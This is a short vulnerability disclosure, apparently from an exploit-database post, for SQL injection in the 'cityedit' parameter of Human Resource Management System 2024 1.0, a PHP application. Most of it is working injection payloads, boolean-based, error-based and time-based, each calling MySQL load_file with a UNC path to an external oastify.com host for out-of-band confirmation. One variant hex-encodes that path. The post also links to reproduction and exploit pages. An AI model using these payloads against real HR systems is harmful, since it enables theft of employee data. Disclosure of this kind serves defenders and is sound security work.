Headline
Human Resource Management System 2024 1.0 SQL Injection
Human Resource Management System 2024 version 1.0 suffers from a remote SQL injection vulnerability.
## Title: hrm2024.1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 04/02/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The cityedit parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'was submitted in the cityedit parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system by using thisvulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: cityedit (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(selectload_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+''ELSE 0x28 END)) AND 'GMzs'='GMzs Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR) Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT(ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qJHK'='qJHK Type: time-based blind Title: MySQL > 5.0.12 AND time-based blind (heavy query) Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR1) AND 'Jtnd'='Jtnd---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/hrm-2024.1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/hrm202410-multiple-sqli.html)## Time spent:01:15:00